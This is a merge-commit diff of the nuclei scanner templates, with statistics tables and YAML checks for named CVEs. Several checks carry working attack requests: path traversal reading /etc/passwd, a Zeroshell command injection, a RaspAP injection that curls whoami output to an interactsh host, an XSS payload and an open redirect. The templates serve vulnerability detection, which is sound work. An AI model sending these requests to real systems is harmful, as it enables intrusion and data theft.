Merge remote-tracking branch 'upstream/master'

2022-03-15 19:03:01 +09:00 · 2022-03-15 19:03:01 +09:00 · b08641a3ab
parent 5022e4c931 50265c326c
commit b08641a3ab
158 changed files with 3307 additions and 4814 deletions
--- a/.new-additions
+++ b/.new-additions
--- a/README.md
+++ b/README.md
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1046 | daffainfo     |   544 | cves             |  1051 | info     |  1064 | http    |  2880 |
+| cve       |  1056 | daffainfo     |   544 | cves             |  1061 | info     |  1067 | http    |  2905 |
-| panel     |   441 | dhiyaneshdk   |   406 | exposed-panels   |   441 | high     |   776 | file    |    57 |
+| panel     |   446 | dhiyaneshdk   |   406 | exposed-panels   |   447 | high     |   789 | file    |    57 |
-| lfi       |   426 | pikpikcu      |   313 | vulnerabilities  |   417 | medium   |   616 | network |    49 |
+| lfi       |   430 | pikpikcu      |   313 | vulnerabilities  |   421 | medium   |   622 | network |    49 |
-| xss       |   333 | pdteam        |   255 | technologies     |   225 | critical |   384 | dns     |    16 |
+| xss       |   335 | pdteam        |   257 | technologies     |   227 | critical |   384 | dns     |    17 |
-| wordpress |   328 | geeknik       |   174 | exposures        |   199 | low      |   171 |         |       |
+| wordpress |   329 | geeknik       |   174 | exposures        |   199 | low      |   169 |         |       |
-| exposure  |   275 | dwisiswant0   |   162 | misconfiguration |   188 |          |       |         |       |
+| exposure  |   282 | dwisiswant0   |   163 | misconfiguration |   188 | unknown  |     6 |         |       |
-| rce       |   267 | 0x_akoko      |   111 | workflows        |   185 |          |       |         |       |
+| rce       |   268 | 0x_akoko      |   114 | workflows        |   185 |          |       |         |       |
-| cve2021   |   250 | gy741         |   108 | token-spray      |   147 |          |       |         |       |
+| cve2021   |   251 | gy741         |   109 | token-spray      |   147 |          |       |         |       |
-| tech      |   236 | princechaddha |   106 | default-logins   |    74 |          |       |         |       |
+| tech      |   238 | princechaddha |   109 | default-logins   |    77 |          |       |         |       |
 | wp-plugin |   235 | pussycat0x    |   104 | takeovers        |    67 |          |       |         |       |
-**222 directories, 3221 files**.
+**225 directories, 3247 files**.
 </td>
 </tr>
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
--- a/TEMPLATES-STATS.md
+++ b/TEMPLATES-STATS.md
--- a/TOP-10.md
+++ b/TOP-10.md
@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1046 | daffainfo     |   544 | cves             |  1051 | info     |  1064 | http    |  2880 |
+| cve       |  1056 | daffainfo     |   544 | cves             |  1061 | info     |  1067 | http    |  2905 |
-| panel     |   441 | dhiyaneshdk   |   406 | exposed-panels   |   441 | high     |   776 | file    |    57 |
+| panel     |   446 | dhiyaneshdk   |   406 | exposed-panels   |   447 | high     |   789 | file    |    57 |
-| lfi       |   426 | pikpikcu      |   313 | vulnerabilities  |   417 | medium   |   616 | network |    49 |
+| lfi       |   430 | pikpikcu      |   313 | vulnerabilities  |   421 | medium   |   622 | network |    49 |
-| xss       |   333 | pdteam        |   255 | technologies     |   225 | critical |   384 | dns     |    16 |
+| xss       |   335 | pdteam        |   257 | technologies     |   227 | critical |   384 | dns     |    17 |
-| wordpress |   328 | geeknik       |   174 | exposures        |   199 | low      |   171 |         |       |
+| wordpress |   329 | geeknik       |   174 | exposures        |   199 | low      |   169 |         |       |
-| exposure  |   275 | dwisiswant0   |   162 | misconfiguration |   188 |          |       |         |       |
+| exposure  |   282 | dwisiswant0   |   163 | misconfiguration |   188 | unknown  |     6 |         |       |
-| rce       |   267 | 0x_akoko      |   111 | workflows        |   185 |          |       |         |       |
+| rce       |   268 | 0x_akoko      |   114 | workflows        |   185 |          |       |         |       |
-| cve2021   |   250 | gy741         |   108 | token-spray      |   147 |          |       |         |       |
+| cve2021   |   251 | gy741         |   109 | token-spray      |   147 |          |       |         |       |
-| tech      |   236 | princechaddha |   106 | default-logins   |    74 |          |       |         |       |
+| tech      |   238 | princechaddha |   109 | default-logins   |    77 |          |       |         |       |
 | wp-plugin |   235 | pussycat0x    |   104 | takeovers        |    67 |          |       |         |       |
--- a/cves/2010/CVE-2010-1540.yaml
+++ b/cves/2010/CVE-2010-1540.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1540
 info:
  name: Joomla! Component com_blog - Directory Traversal
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
  remediation: Upgrade to a supported version.
  reference: |
    - https://www.exploit-db.com/exploits/11625
    - https://www.cvedetails.com/cve/CVE-2010-1540
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1540
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/03/06
--- a/cves/2010/CVE-2010-1601.yaml
+++ b/cves/2010/CVE-2010-1601.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1601
 info:
  name: Joomla! Component JA Comment - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12236
    - https://www.cvedetails.com/cve/CVE-2010-1601
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1601
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/03/06
--- a/cves/2010/CVE-2010-1602.yaml
+++ b/cves/2010/CVE-2010-1602.yaml
@ -5,7 +5,6 @@ info:
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12283
    - https://www.cvedetails.com/cve/CVE-2010-1602
@ -26,4 +25,4 @@ requests:
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+# Enhanced by mp on 2022/03/07
--- a/cves/2010/CVE-2010-1607.yaml
+++ b/cves/2010/CVE-2010-1607.yaml
@ -5,7 +5,6 @@ info:
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12316
    - https://www.cvedetails.com/cve/CVE-2010-1607
@ -26,4 +25,4 @@ requests:
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+# Enhanced by mp on 2022/03/07
--- a/cves/2010/CVE-2010-1715.yaml
+++ b/cves/2010/CVE-2010-1715.yaml
@ -1,16 +1,17 @@
 id: CVE-2010-1715
 info:
  name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  remediation: Upgrade to a supported version.
  reference:
    - https://www.exploit-db.com/exploits/12174
    - https://www.cvedetails.com/cve/CVE-2010-1715
  tags: cve,cve2010,joomla,lfi
  classification:
    cve-id: CVE-2010-1715
 requests:
  - method: GET
    path:
@ -23,4 +24,5 @@ requests:
      - type: status
        status:
          - 200
-# Enhanced by mp on 2022/02/15
+
 # Enhanced by mp on 2022/03/10
--- a/cves/2017/CVE-2017-9833.yaml
+++ b/cves/2017/CVE-2017-9833.yaml
@ -0,0 +1,31 @@
 id: CVE-2017-9833
 info:
  name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
  author: 0x_Akoko
  severity: high
  description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.
  reference:
    - https://www.exploit-db.com/exploits/42290
    - https://www.cvedetails.com/cve/CVE-2017-9833
  tags: boa,lfr,lfi,cve,cve2017
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2017-9833
    cwe-id: CWE-22
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
      - type: status
        status:
          - 200
--- a/cves/2018/CVE-2018-12296.yaml
+++ b/cves/2018/CVE-2018-12296.yaml
@ -0,0 +1,37 @@
 id: CVE-2018-12296
 info:
  name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure
  author: princechaddha
  severity: high
  description: Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests.
  reference:
    - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12296
  tags: cve,cve2018,seagate,nasos,disclosure,unauth
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2018-12296
    cwe-id: CWE-732
 requests:
  - raw:
      - |
        POST /api/external/7.0/system.System.get_infos HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
    matchers:
      - type: word
        part: body
        words:
          - '"version":'
          - '"serial_number":'
        condition: and
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"version": "([0-9.]+)"'
--- a/cves/2018/CVE-2018-12300.yaml
+++ b/cves/2018/CVE-2018-12300.yaml
@ -0,0 +1,28 @@
 id: CVE-2018-12300
 info:
  name: Seagate NAS OS 4.3.15.1 - Open redirect
  author: 0x_Akoko
  severity: medium
  description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
  reference:
    - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
    - https://www.cvedetails.com/cve/CVE-2018-12300
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2018-12300
    cwe-id: CWE-601
  tags: cve,cve2018,redirect,seagate,nasos
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#'
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
--- a/cves/2019/CVE-2019-12725.yaml
+++ b/cves/2019/CVE-2019-12725.yaml
@ -2,7 +2,7 @@ id: CVE-2019-12725
 info:
  name: Zeroshell 3.9.0 Remote Command Execution
-  author: dwisiswant0
+  author: dwisiswant0,akincibor
  severity: critical
  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
@ -20,14 +20,17 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
+      - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        part: body
        regex:
-          - "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
+          - "root:.*:0:0:"
 # Enhanced by mp on 2022/02/04
--- a/cves/2020/CVE-2020-13158.yaml
+++ b/cves/2020/CVE-2020-13158.yaml
@ -0,0 +1,31 @@
 id: CVE-2020-13158
 info:
  name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
  reference:
    - https://github.com/InfoSec4Fun/CVE-2020-13158
    - https://sourceforge.net/projects/artica-squid/files/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13158
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-13158
    cwe-id: CWE-22
  tags: cve,cve2020,artica,lfi
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"
      - type: status
        status:
          - 200
--- a/cves/2020/CVE-2020-15050.yaml
+++ b/cves/2020/CVE-2020-15050.yaml
@ -0,0 +1,30 @@
 id: CVE-2020-15050
 info:
  name: Suprema BioStar2 - Local File Inclusion (LFI)
  author: gy741
  severity: high
  description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
  reference:
    - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
    - https://www.supremainc.com/en/support/biostar-2-pakage.asp
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15050
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.50
    cve-id: CVE-2020-15050
  tags: cve,cve2020,lfi,suprema,biostar2
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
--- a/cves/2020/CVE-2020-7943.yaml
+++ b/cves/2020/CVE-2020-7943.yaml
@ -0,0 +1,38 @@
 id: CVE-2020-7943
 info:
  name: Puppet Server and PuppetDB sensitive information disclosure
  severity: high
  author: c-sh0
  description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
  reference:
    - https://puppet.com/security/cve/CVE-2020-7943
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7943
    - https://tickets.puppetlabs.com/browse/PDB-4876
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2020-7943
    cwe-id: CWE-276
  tags: cve,cve2020,puppet,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/metrics/v1/mbeans"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: header
        words:
          - "application/json"
      - type: word
        part: body
        words:
          - "trapperkeeper"
--- a/cves/2021/CVE-2021-3002.yaml
+++ b/cves/2021/CVE-2021-3002.yaml
@ -0,0 +1,43 @@
 id: CVE-2021-3002
 info:
  name: Seo Panel 4.8.0 - Post based Reflected XSS
  author: edoardottt
  severity: medium
  description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-3002
    cwe-id: CWE-79
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
    - http://www.cinquino.eu/SeoPanelReflect.htm
  tags: cve,cve2021,seopanel,xss
 requests:
  - raw:
      - |
        POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: header
        words:
          - "text/html"
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "seopanel"
        condition: and
--- a/cves/2021/CVE-2021-33357.yaml
+++ b/cves/2021/CVE-2021-33357.yaml
@ -4,13 +4,14 @@ info:
  name: RaspAP <= 2.6.5 - Remote Code Execution
  author: pikpikcu,pdteam
  severity: critical
  description: |
    RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
  tags: cve,cve2021,rce,raspap,oast
  reference:
    - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/
    - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33357
    - https://github.com/RaspAP/raspap-webgui
  description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
  tags: cve,cve2021,rce,raspap,oast
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
@ -22,12 +23,17 @@ requests:
    path:
      - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;"
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
      - type: word
        words:
          - "DHCPEnabled"
    extractors:
      - type: regex
        part: interactsh_request
--- a/cves/2021/CVE-2021-3654.yaml
+++ b/cves/2021/CVE-2021-3654.yaml
@ -3,12 +3,17 @@ id: CVE-2021-3654
 info:
  name: noVNC Open Redirect
  author: geeknik
-  severity: low
+  severity: medium
  description: A user-controlled input redirects noVNC users to an external website.
  reference:
    - https://seclists.org/oss-sec/2021/q3/188
    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
  tags: redirect,novnc,cve,cve2021
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2021-3654
    cwe-id: CWE-601
 requests:
  - method: GET
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
@ -1,10 +1,11 @@
 id: CVE-2021-40868
 info:
-  name: Cloudron 6.2 Cross Site Scripting
+  name: Cloudron 6.2 Cross-Site Scripting
  author: daffainfo
  severity: medium
-  description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
+  description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
  remediation: Upgrade to Cloudron 6.3 or higher.
  reference:
    - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40868
@ -35,3 +36,5 @@ requests:
        words:
          - '</script><script>alert(document.domain)</script>'
        part: body
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-40870.yaml
+++ b/cves/2021/CVE-2021-40870.yaml
@ -1,11 +1,12 @@
 id: CVE-2021-40870
 info:
-  name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
+  name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
  author: pikpikcu
  severity: critical
-  description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
+  description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
  reference:
    - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
    - https://wearetradecraft.com/advisories/tc-2021-0002/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40870
  tags: cve,cve2021,rce,aviatrix
@ -41,3 +42,5 @@ requests:
          - "PHP Extension"
          - "PHP Version"
        condition: and
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-40875.yaml
+++ b/cves/2021/CVE-2021-40875.yaml
@ -1,16 +1,16 @@
 id: CVE-2021-40875
 info:
-  name: Gurock TestRail Application files.md5 exposure
+  name: Gurock TestRail Application files.md5 Exposure
  author: oscarintherocks
  severity: medium
-  description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
+  description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
  tags: cve,cve2021,exposure,gurock,testrail
  reference:
-    https://github.com/SakuraSamuraii/derailed
+    - htttps://github.com/SakuraSamuraii/derailed
-    https://johnjhacking.com/blog/cve-2021-40875/
+    - https://johnjhacking.com/blog/cve-2021-40875/
-    https://www.gurock.com/testrail/tour/enterprise-edition
+    - https://www.gurock.com/testrail/tour/enterprise-edition
-    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
  classification:
    cve-id: CVE-2021-40875
  metadata:
@ -34,3 +34,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-40960.yaml
+++ b/cves/2021/CVE-2021-40960.yaml
@ -30,3 +30,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-40978.yaml
+++ b/cves/2021/CVE-2021-40978.yaml
@ -1,14 +1,15 @@
 id: CVE-2021-40978
 info:
-  name: mkdocs 1.2.2 built-in dev-server allows directory traversal
+  name: MKdocs 1.2.2 Directory Traversal
  author: pikpikcu
  severity: high
  reference:
    - https://github.com/mkdocs/mkdocs/pull/2604
    - https://github.com/nisdn/CVE-2021-40978
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40978
  tags: cve,cve2021,mkdocs,lfi
-  description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
+  description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
@ -31,3 +32,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-41174.yaml
+++ b/cves/2021/CVE-2021-41174.yaml
@ -1,10 +1,11 @@
 id: CVE-2021-41174
 info:
-  name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
+  name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
  author: pdteam
  severity: medium
  description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
  remediation: Upgrade to 8.2.3 or higher.
  reference:
    - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41174
@ -44,3 +45,5 @@ requests:
        group: 1
        regex:
          - '"subTitle":"Grafana ([a-z0-9.]+)'
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-41266.yaml
+++ b/cves/2021/CVE-2021-41266.yaml
@ -5,7 +5,8 @@ info:
  author: alevsk
  severity: critical
  description: |
-    Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.
+    MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
  remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token."
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41266
    - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
@ -44,3 +45,5 @@ requests:
        part: header
        words:
          - "token"
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-41277.yaml
+++ b/cves/2021/CVE-2021-41277.yaml
@ -4,7 +4,8 @@ info:
  name: Metabase Local File Inclusion
  author: 0x_Akoko
  severity: critical
-  description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you&#8217;re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
+  description: "Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded."
  remediation: "This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application."
  reference:
    - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41277
@ -34,3 +35,5 @@ requests:
      - type: status
        status:
          - 200
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-41291.yaml
+++ b/cves/2021/CVE-2021-41291.yaml
@ -4,8 +4,9 @@ info:
  name: ECOA Building Automation System - Directory Traversal Content Disclosure
  author: gy741
  severity: high
-  description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
+  description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41291
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
    - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
  tags: cve,cve2021,ecoa,lfi,traversal
@ -25,3 +26,5 @@ requests:
      - type: regex
        regex:
          - "root:.*:0:0:"
 # Enhanced by mp on 2022/03/06
--- a/cves/2021/CVE-2021-41293.yaml
+++ b/cves/2021/CVE-2021-41293.yaml
@ -1,11 +1,12 @@
 id: CVE-2021-41293
 info:
-  name: ECOA Building Automation System - LFD
+  name: ECOA Building Automation System - Local File Disclosure
  author: 0x_Akoko
  severity: high
-  description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
+  description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41293
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
    - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
  tags: cve,cve2021,ecoa,lfi,disclosure
@ -33,3 +34,5 @@ requests:
      - type: status
